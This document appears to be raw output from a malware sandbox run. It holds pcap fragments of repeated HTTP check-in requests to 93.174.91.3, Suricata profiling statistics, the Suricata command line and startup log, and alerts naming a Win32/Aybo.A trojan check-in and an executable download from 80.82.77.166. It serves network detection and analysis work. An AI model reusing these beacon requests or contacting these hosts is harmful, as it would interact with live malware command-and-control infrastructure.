User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$ÓDÄ*Ñ

À¨8]®[ڏP
_Y
$ÓY
$ÓDÄ

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$çQò*Ñ

À¨8]®[ڏP
_Y
$çY
$çQò

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$ûæ*Ñ

À¨8]®[ڏP
_Y
$ûY
$ûæ

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
%òù*Ñ

À¨8]®[ڏP
_Y
%Y
%òù

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/22/2019 -- 13:17:20
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             25320910        4729            4729            136508          5354.00         5354.00         0.00           
  content          97692396        4684            1908            340414          20856.00        21494.00        20418.00       
  pcre             14906350        667             86              9224232         22348.00        9807.00         24204.00       
  byte_test        5291824         933             251             95766           5671.00         5702.00         5660.00        
  byte_jump        373924          68              62              20096           5498.00         5568.00         4779.00        
  isdataat         18766           4               1               4986            4691.00         4526.00         4746.00        
  flowbits         9597418         1879            49              70346           5107.00         6158.00         5079.00        
  urilen           1731406         301             218             88534           5752.00         5484.00         6455.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             25320910        4729            4729            136508          5354.00         5354.00         0.00           
  flowbits         9456794         1862            32              70346           5078.00         5036.00         5079.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          43866320        1544            496             340414          28410.00        39224.00        23292.00       
  pcre             334150          30              3               54830           11138.00        30259.00        9013.00        
  byte_test        5099804         891             251             95766           5723.00         5702.00         5731.00        
  byte_jump        105698          20              14              13428           5284.00         5501.00         4779.00        
  isdataat         18766           4               1               4986            4691.00         4526.00         4746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         140624          17              17              21966           8272.00         8272.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5610180         933             711             33402           6013.00         5931.00         6274.00        
  pcre             13063618        449             65              9224232         29094.00        8985.00         32498.00       
  urilen           1731406         301             218             88534           5752.00         5484.00         6455.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13242           2               2               8620            6621.00         6621.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          87798           16              0               10208           5487.00         0.00            5487.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          42912600        1271            243             250684          33762.00        60431.00        27458.00       
  pcre             1132734         151             0               30956           7501.00         0.00            7501.00        
  byte_test        192020          42              0               4942            4571.00         0.00            4571.00        
  byte_jump        268226          48              48              20096           5588.00         5588.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3462094         593             307             29402           5838.00         5940.00         5728.00        
  pcre             298678          34              17              23030           8784.00         8582.00         8986.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          386184          69              52              8412            5596.00         5497.00         5902.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          245408          44              43              8118            5577.00         5579.00         5476.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6878            1               0               6878            6878.00         0.00            6878.00        
  pcre             29522           1               0               29522           29522.00        0.00            29522.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          896106          174             46              20006           5150.00         5357.00         5075.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5198            1               1               5198            5198.00         5198.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27272           5               5               6250            5454.00         5454.00         0.00           
  pcre             47648           2               1               24964           23824.00        22684.00        24964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5294            1               0               5294            5294.00         0.00            5294.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          167822          30              2               20598           5594.00         6038.00         5562.00        

lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/bc723fab22ff6f9155158c04712f3dbe56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap -vvv -k none
elapsedtime:26.929215
stderr:
stdout:
22/11/2019 -- 13:16:53 - <Info> - Configuration node 'rule-files' redefined.
22/11/2019 -- 13:16:53 - <Notice> - This is Suricata version 4.0.0 RELEASE
22/11/2019 -- 13:16:53 - <Info> - CPUs/cores online: 1
22/11/2019 -- 13:16:53 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33633 and 'request-body-inspect-window' set to 16399 after randomization.
22/11/2019 -- 13:16:53 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31366 and 'response-body-inspect-window' set to 16035 after randomization.
22/11/2019 -- 13:16:53 - <Config> - DNS request flood protection level: 500
22/11/2019 -- 13:16:53 - <Config> - DNS per flow memcap (state-memcap): 524288
22/11/2019 -- 13:16:53 - <Config> - DNS global memcap: 16777216
22/11/2019 -- 13:16:53 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
22/11/2019 -- 13:16:53 - <Config> - preallocated 1000 hosts of size 136
22/11/2019 -- 13:16:53 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
22/11/2019 -- 13:16:53 - <Config> - using magic-file /usr/share/file/magic
22/11/2019 -- 13:16:53 - <Config> - Core dump size is unlimited.
22/11/2019 -- 13:16:53 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
22/11/2019 -- 13:16:53 - <Config> - preallocated 1000 defrag trackers of size 168
22/11/2019 -- 13:16:53 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
22/11/2019 -- 13:16:53 - <Config> - stream "prealloc-sessions": 2048 (per thread)
22/11/2019 -- 13:16:53 - <Config> - stream "memcap": 33554432
22/11/2019 -- 13:16:53 - <Config> - stream "midstream" session pickups: disabled
22/11/2019 -- 13:16:53 - <Config> - stream "async-oneside": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "checksum-validation": disabled
22/11/2019 -- 13:16:53 - <Config> - stream."inline": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "bypass": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "max-synack-queued": 5
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "memcap": 134217728
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "depth": 0
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "toserver-chunk-size": 2513
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "toclient-chunk-size": 2523
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly.raw: enabled
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "segment-prealloc": 2048
22/11/2019 -- 13:16:53 - <Config> - Delayed detect disabled
22/11/2019 -- 13:16:53 - <Config> - pattern matchers: MPM: ac, SPM: bm
22/11/2019 -- 13:16:53 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
22/11/2019 -- 13:16:53 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
22/11/2019 -- 13:16:53 - <Config> - prefilter engines: MPM
22/11/2019 -- 13:16:53 - <Config> - IP reputation disabled
22/11/2019 -- 13:16:53 - <Perf> - Registered 148 keyword profiling counters.
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
22/11/2019 -- 13:16:58 - <Config> - No rules loaded from ET-icmp.rules.
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
22/11/2019 -- 13:17:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
22/11/2019 -- 13:17:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
22/11/2019 -- 13:17:07 - <Config> - No rules loaded from local.rules.
22/11/2019 -- 13:17:07 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
22/11/2019 -- 13:17:07 - <Info> - Threshold config parsed: 0 rule(s) found
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tcp-packet
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tcp-stream
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for udp-packet
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for other-ip
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_uri
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_request_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_client_body
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_response_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header_names
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header_names
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept_enc
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept_lang
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_referer
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_connection
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_len
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_len
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_type
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_type
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_start
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_start
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_method
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_cookie
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_cookie
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_uri
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_user_agent
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_host
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_host
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_stat_msg
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_stat_code
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dns_query
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_sni
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_issuer
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_subject
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_serial
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dce_stub_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dce_stub_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_software
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_software
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for file_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for file_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_request_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_response_line
22/11/2019 -- 13:17:08 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
22/11/2019 -- 13:17:08 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
22/11/2019 -- 13:17:08 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
22/11/2019 -- 13:17:08 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
22/11/2019 -- 13:17:08 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
22/11/2019 -- 13:17:08 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
22/11/2019 -- 13:17:08 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
22/11/2019 -- 13:17:08 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
22/11/2019 -- 13:17:15 - <Perf> - Unique rule groups: 104
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver TCP packet": 35
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient TCP packet": 17
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver TCP stream": 33
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient TCP stream": 19
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver UDP packet": 27
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient UDP packet": 17
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "other IP packet": 3
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_uri": 14
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_request_line": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_client_body": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_response_line": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_header": 10
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_header": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_header_names": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_accept": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_referer": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_content_len": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_content_type": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_content_type": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_protocol": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_start": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_method": 5
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_cookie": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_cookie": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_host": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver dns_query": 4
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver tls_sni": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver file_data": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient file_data": 7
22/11/2019 -- 13:17:18 - <Perf> - Registered 39590 rule profiling counters.
22/11/2019 -- 13:17:18 - <Info> - fast output device (regular) initialized: alert
22/11/2019 -- 13:17:18 - <Info> - eve-log output device (regular) initialized: eve.json
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'alert'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'http'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'dns'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'tls'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'files'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'ssh'
22/11/2019 -- 13:17:18 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
22/11/2019 -- 13:17:18 - <Info> - stats output device (regular) initialized: stats.log
22/

05/03/2017-18:40:34.112005  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.587187  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.815152  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:54.863994  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:41:14.754072  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.754072  [**] [1:2020826:7] ET CURRENT_EVENTS Potential Dridex.Maldoc Minimal Executable Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.769013  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.769013  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.963605  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:42:10.414096  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:10.983439  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:30.962161  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:51.021004  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
